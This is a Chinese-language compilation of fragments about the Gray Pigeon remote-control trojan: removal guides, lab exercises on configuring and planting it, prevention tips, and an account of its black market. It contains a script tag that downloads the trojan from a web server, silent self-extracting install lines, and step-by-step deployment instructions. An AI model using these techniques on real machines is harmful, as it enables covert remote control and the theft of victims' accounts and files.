灰鸽子木马利用与防护
灰鸽子病毒检测及清除的手段方法
4、根据灰鸽子原理分析我们知道,如果Game_Hook.DLL是灰鸽子的文件,则在操作系统安装目录下还会有Game.exe和Game.dll文件。打开Windows目录,果然有这两个文件,同时还有一个用于记录键盘操作的GameKey.dll文件。
[img][/img]
经过这几步操作我们基本就可以确定这些文件是灰鸽子服务端了,下面就可以进行手动清除。
2000/XP系统:
1、打开注册表编辑器(点击“开始”-》“运行”,输入“Regedit.exe”,确定。),打开HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services注册表项。
2、点击菜单“编辑”-》“查找”,“查找目标”输入“game.exe”,点击确定,我们就可以找到灰鸽子的服务项(此例为Game_Server,每个人这个服务项名称是不同的)。
灰鸽子病毒 是一个免杀的远程控制软件,但是作为病毒使用也很方便
一、灰鸽子病毒详细简介
灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。这就好比火药,用在不同的场合,给人类带来不同的影响。对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚,在此我们只能进行简要介绍。
1、由于灰鸽子的文件本身具有隐藏属性,因此要设置Windows显示所有文件。打开“我的电脑”,选择菜单“工具”—》“文件夹选项”,点击“查看”,取消“隐藏受保护的操作系统文件”前的对勾,并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”,然后点击“确定”。
12-反弹端口木马(灰鸽子)的演示
项目4 计算机病毒及防治
任务5: 反弹端口木马(灰鸽子)的演示
P111
- 1 -
任务5: 反弹端口木马(灰鸽子)的演示 1
项目背景
普通木马是攻击者主动去连接被攻击者,对于外部连 接审查严格的防火墙,木马很难工作起来,但如果被 攻击者主动连接攻击者?
飞蛾扑火的情况下, 作为一名网络安全人 员,你该做些什么, 如何去应对?
- 2 -
(12)本节任务目标和内容
任务目标:
了解:反弹端口木马(灰鸽子)的危害; 熟悉:灰鸽子木马的工作原理; 掌握:灰鸽子木马的配置和操作;
任务内容:
通过灰鸽子木马实际攻击演示操作,掌握灰鸽子木 马的攻击原理,为防范灰鸽子木马的学习作准备。
- 3 -
一、反弹端口木马(灰鸽子)演示实验
控制端打开某个监听端口,被控制端主动 连接控制端。
工作过程 P112
木马伪装 配置木马 信息反馈 传播木马 启动木马 建立连接 远程控制
- 4 -
1.配置服务器程序
切入点:
控制端
双击灰鸽子木马“客户端”程序
配置服务程序
邀请一名同学实际 演示!
- 5 -
重点说明:配置服务器程序
控制端IP
- 6 -
连接成功,现在可以对主 机进行远程控制了。
- 8 -
二、分角色操作演示:
成员甲(客户端,控制者) 192.168.1.1 第1步:配置服务器端程序。 第2步:将服务器端程序共享给成员 乙。
成员乙:(服务器端,被控制者) 192.168.1.2
第3步:运行服务器端程序(注意细
节)? 第6步:查看F盘是否新增一文件夹。
配置-传播-启动-连接-控制
反病毒专家教你六大绝技彻底防范灰鸽子
反病毒专家教你六大绝技彻底防范灰鸽子严循东 2007年3月28日曾经有一个网游爱好者这样形容网络游戏,“网络游戏更像是一场战争,一场玩家与盗号者之间的战争。
”由此可见,盗号已经成为网游世界中,令玩家们深恶痛绝的顽疾。
那么面对以灰鸽子为首的盗号木马,作为网络游戏玩家的你,该如何保护自己的帐号密码完好无损,不被窃取呢?首先,要给自己的电脑做一次“体检”。
因为灰鸽子木马的隐蔽性很强,入侵后根本毫无察觉,通过“体检”,检查一下自己的系统是否已经感染灰鸽子。
“体检”工具就用免费的灰鸽子木马专杀,比如金山毒霸灰鸽子专杀等。
其次,安装正版杀毒软件,保持实时监控的可靠运行,注意及时更新。
灰鸽子的变种非常多,每天都将有不同的变种出现,如果不能及时升级,杀毒软件很难具备对灰鸽子木马新变种的拦截能力。
此外,灰鸽子有个非常“厉害”的特点,黑客可以在远程将控制的所有肉鸡升级到最新版本。
新版本就是专门针对杀毒软件而进行了技术处理的版本,避免被最新的杀毒软件检测到。
因此除了技术手段防范灰鸽子之外,为了捍卫自己的网络资产,玩家还需要从以下几个方面提高警惕:1.注意升级系统补丁,可以用windows update或金山漏洞修复2007来检查修复系统漏洞。
3.游戏玩家的电脑一般在线时间比较长,要特别留意电脑无人值守时的安全问题。
最好把含有隐私信息的数据加密处理。
4.在电脑处于开启状态时,如果不使用摄像头,最好拔掉摄像头,避免被人偷窥。
5.网游玩家通常能熟练的使用线上交易,比如支付宝,网上银行等等。
强烈建议使用专业版移动证书型网上银行,完成支付立即拔掉证书,避免被人远程控制电脑支取。
浏览网页中木马的原理和防范--灰鸽子网页木马的制作和解析
浏览网页中木马的原理和防范--灰鸽子网页木马的制作和解析1.网页木马从原理如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。
这是我一黑客朋友给我说的一句说。
打开该网站的首页,经检查,我确实中了灰鸽子。
怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马。
以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。
很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。
一、网页木马的攻击原理首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。
为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。
实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。
下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。
⒈自动下载程序<SCRIPT LANGUAGE="icyfoxlovelace" src="hxxp:///1.exe"></SCRIPT>小提示:代码说明a. 代码中“src”的属性为程序的网络地址,本例中“/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。
灰鸽子
灰鸽子产业链一、灰鸽子灰鸽子(Hack. Huigezi)是一个集多种控制方法于一体的木马病毒,一旦用户电脑不幸感染,可以说用户的一举一动都在黑客的监控之下,要窃取账号、密码、照片、重要文件都轻而易举。
更甚的是,他们还可以连续捕获远程电脑屏幕,还能监控被控电脑上的摄像头,自动开机(不开显示器)并利用摄像头进行录像。
截至2006年底,“灰鸽子”木马已经出现了6万多个变种。
客户端简易便捷的操作使刚入门的初学者都能充当黑客。
当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。
但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。
二、产业链在灰鸽子中,木马的制造者作为第一个环节,仅仅是提供"作案"工具,一般本身不参与到"赚钱"的环节,只是通过卖出"工具"来获利.而传播病毒环节则在购买到病毒之后,再提高价格,一级一级卖给下层的病毒购买者,非常类似于普通产品的经销商模式.木马病毒经过层层传递之后,达到病毒操作者的手里,也就是行话中的"大侠","大侠"在自己进行盗窃,破坏网络的同时召集"徒弟", 教授木马病毒控制技术和网络盗窃技术, 并收取一定的"培训费", 同时将"徒弟"发展为下线,专职盗号或窃取他人信息.被木马侵入的电脑则被形象的称为"肉鸡", "肉鸡"的个人信息,账号,游戏装备,私人照片,私人视频,QQ 号码等被专职盗号的黑客盗取后在网上的正规交易网站正常交易. 除了倒卖"肉鸡"中的数据外, 黑客们还可能将自己没有兴趣的"肉鸡"倒卖给其他的黑客继续摧残, 或者将"肉鸡"倒卖给广告商, 被控制电脑被随意投放广告,甚至干脆控制电脑点击某网站广告,一举一动都能被监视和控制. 如此严密的黑色经济产业链条令人触目惊心. 不仅有严密的产业链条,黑色经济的价格体系也非常完善.据黑客界有关人士介绍, 能够使用几天的"肉鸡"在国内可以卖到0.5 元到1 元一只, 如果可以使用半个月以上, 则可卖到几十元一只.而且不同地区的"肉鸡",价格也不一样:内陆"肉鸡"0.1——0.4 元一只, 辽宁"肉鸡"0.5——0.8 元一只, 广东"肉鸡"1 元一只, 港台"肉鸡"3 块一只, 外国"肉鸡"则能买到5 元一只,在即将到来的北京奥运期间,"奥运肉鸡"将更加抢手.三、产业链具体介绍木马、肉鸡、灰鸽子……这些圈外人刚刚听说的网络用语,构成的不仅是一个庞大的、黑色的、暴利的地下产业帝国,更是一个侵犯网民个人隐私、盗窃网络无形财产的罪恶瘟疫,游戏账号、QQ 密码、银行账号……电脑用户的个人信息和财产被一个个网络黑手窃为己有,而这一切只需要一个软件。
灰鸽子病毒的原理和运行方式是怎么样的
灰鸽子病毒的原理和运行方式是怎么样的灰鸽子远程病毒我想谁都不陌生吧?曾经控制着我们电脑,信息恶意传播,你知道灰鸽子病毒的原理和运行方式吗?下面由店铺给你做出详细的灰鸽子病毒的原理和运行方式介绍!希望对你有帮助!灰鸽子病毒的原理和运行方式介绍:灰鸽子远程监控软件分两部分:客户端和服务端。
黑客(姑且这么称呼吧)操纵着客户端,利用客户端配置生成出一个服务端程序。
服务端文件的名字默认为G_Server.exe,然后黑客通过各种渠道传播这个服务端(俗称种木马)。
种木马的手段有很多,比如,黑客可以将它与一张图片绑定,然后假冒成一个羞涩的MM通过QQ把木马传给你,诱骗你运行;也可以建立一个个人网页,诱骗你点击,利用IE漏洞把木马下载到你的机器上并运行;还可以将文件上传到某个软件下载站点,冒充成一个有趣的软件诱骗用户下载……,这正违背了我们开发灰鸽子的目的,所以本文适用于那些让人非法安装灰鸽子服务端的用户,帮助用户删除灰鸽子 Vip 2005 的服务端程序。
本文大部分内容摘自互联网。
G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录,2k/NT下为系统盘的Winnt目录),然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。
G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端,有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。
注意,G_Server.exe这个名称并不固定,它是可以定制的,比如当定制服务端文件名为A.exe 时,生成的文件就是A.exe、A.dll和A_Hook.dll。
Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启动项),每次开机都能自动运行,运行后启动G_Server.dll 和G_Server_Hook.dll并自动退出。
实验六、第三代木马 灰鸽子
灰鸽子木马实验报告一、实验目的及要求[目的]1、了解灰鸽子是一个集多种控制方法于一体的木马病毒。
[内容及要求]1、练习软件的哪些功能2、通过实验了解灰鸽子是一款的远程控制软件。
3、熟悉使用木马进行网络攻击的原理和方法。
[试验环境]虚拟机下安装组建一个局域网 2台安装了win2000/win2003/XP系统的电脑 灰鸽子木马软件。
二、实验方法与步骤:1 打开虚拟机 开启windows server 2003 A与windows server 2003 B 将其网络设备器设置在同一局域网内 例vmnet22 打开灰鸽子 并查看本机IP地址3 点击配置服务程序 新建一个木马病毒密码可设置也可不设置3 将生产的木马病毒设法放入目标主机 并使其运行原始木马样子4 目标主机运行后 本机灰鸽子显示其登录我们可对目标及进行 下载上传等基本运行5 还可以进行更深层次的控制,例如屏幕捕捉与控制,广播,关机开机,注册表的编辑等 (看红框标识处)(6)灰鸽子木马的伪装,木马捆绑器:现今社会杀毒软件的辨识度已然很高,而人们的警惕度也越来越高,木马若想成功的被目标主机运行,必然要做一定的伪装生成一个可执行文件,虽然风险乜很高,但不失为一种方法!6 木马分离器:三、使用心得1 熟悉灰鸽子之后,我们了解了木马的强大以及危害之处,如何防范木马,是当今信息社会的一种不可不重视的问题。
计算机病毒泛滥尤以木马病毒为甚。
木马病毒是一种远程控制程序 “黑客”利用计算机系统和软件的漏洞将一段程序植入远端电脑后,可以借助其配套的控制程序来远程控制中毒电脑 肆无忌惮地查看、下载他人电脑中的内容。
掌握了它的原因,对于防护电脑避免木马入侵我们应该有一定对策2 如何防范木马病毒一、检测网络连接二、禁用不明服务三、轻松检查账户四、及时修补漏洞和关闭可疑的端口五、安装杀毒软件并及时更新六、运行实时监控程序。
灰鸽子杀毒方法
5)重启电脑,在正常情况下,运行“木马克星”,扫描结果是:无可疑木马。结果证明了我们采取的手段没有错。
另外,对于使用瑞星杀毒软件的朋友,通常在中毒之后,在完全断开网络的情况下启动电脑,如果您打开了瑞星的“开机扫描”功能,那么瑞星是能够截杀被注入后的病毒的,但也同样需要经过上述手法彻底清除病毒。而且在彻底清除后,再次断网启动,您会发现病毒没有了,截杀病毒的通报也不会出现了
;下面的注释பைடு நூலகம்含自解压脚本命令
Setup=XXX.exe
Silent=1
Overwrite=1
(XXX表示“灰鸽子”木马真实文件的伪装名称,通常会是诸如“某某软件名”、“色情网站密码”等等诱惑性名称,大家务必自省自制!!!)
注意:就是这样几行脚本命令,使得你在警惕性不高的情况下、随意自解压【大压缩包】的同时,真正的“灰鸽子”木马注入文件即“XXX.exe”将在电脑后台以完全静默方式完成“注入”!!!——之所以你察觉不到它注入的过程,就是“Silent=1”这条命令产生的效果。于是,“灰鸽子”木马便这样悄然地进驻你的电脑 里。
但这并不意味着无法根本、彻底地清除“毒根”,在此以我个人的一次清除过程为例给大家推荐一种方式,彻底地清除“灰鸽子”:
1)启动电脑前先完全断开网络,并安装一套最新的“木马克星”(我安装的是V5.50版本)
2)正常启动电脑,正常后运行“木马克星”,程序将会在系统内找到Backdoor.GPigeon.uac木马的可疑文件,我这次发现的是在c:\windows文件夹下的“win32.exe”文件,木马克星会提醒你是否删除此文件,结果是不能被删除,为什么呢?我就在“文件夹选项”的“查看”面板中勾选“显示系统文件夹内容”、“显示所有文件及文件夹”两个选项,按“确定”按钮。电脑内的所有文件就能完全显示,我再访问c:\windows文件夹,果然在其中找到“win32.exe”文件——文件图标是一个很普通、很不起眼的图标,它被设置成“指读”、“系统”、“存档”文件而起掩饰作用。我尝试直接将其删除,结果仍是无法删除,提示是“系统正在使用,文件处于保护状态”。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
任务名称:灰鸽子木马利用与防护
任务目的与要求:
了解木马病毒对终端主机的安全威胁,以及木马病毒如何对主机进行攻击。
本次任务要求学生学习灰鸽子木马远程控制软件的使用,通过实验可以了解木马和计算机病毒的区别,熟悉使用木马进行网络攻击的原理和方法。
实验任务涉及到的相关知识:
任务环境拓扑:
具体步骤:
1.登录windows2003,打开灰鸽子软件。
winxp
windows2003
2.灰鸽子木马共有两个应用程序,其中一个是服务器程序,该程序由客户端配置产生,属于木马受控端程序,种木马时,需将该程序放入到受控端的计算机中,然后双击该程序即可;H_client.exe是木马的客户端程序,属于木马的主控端程序。
首先点击H_client.exe打开客户端,选择“文件-配置服务器”配置服务器端。
点击“生成服务器”即生成了一个服务器端,点击“确定”
3.登录到XP系统。
点击“开始”-“运行”,输入“\\192.168.0.46(win2003的IP地址,已在win2003系统下通过ipconfig命令查看为准),可以通过共享查看win2003共享的文件,如图所示,将setup.exe拷贝到XP系统的桌面,然后双击运行。
4.返回win2003,点击“文件”-“增加主机”,输入XP的IP地址192.168.0.43(以在XP下通过ipconfig命令查看到得IP为准),点击确定。
5.双击文件目录浏览下的“我的电脑”,可以查看到主机为192.168.0.43的标识。
然后双击192.168.0.43,可以查看到XP系统的目录及文件。
此时点击C:\Documents and Settings\Administrator\桌面,可以查看到XP左面上放置的文件setup.exe服务器端。
6.右击setup.exse,选择“文件下载至”,然后将该文件保存到win2003的桌面。
此时通过灰鸽子对XP系统的文件进行操作,以及查看XP信息,远程发送命
令、编辑注册表、远程监控、命令广播等功能。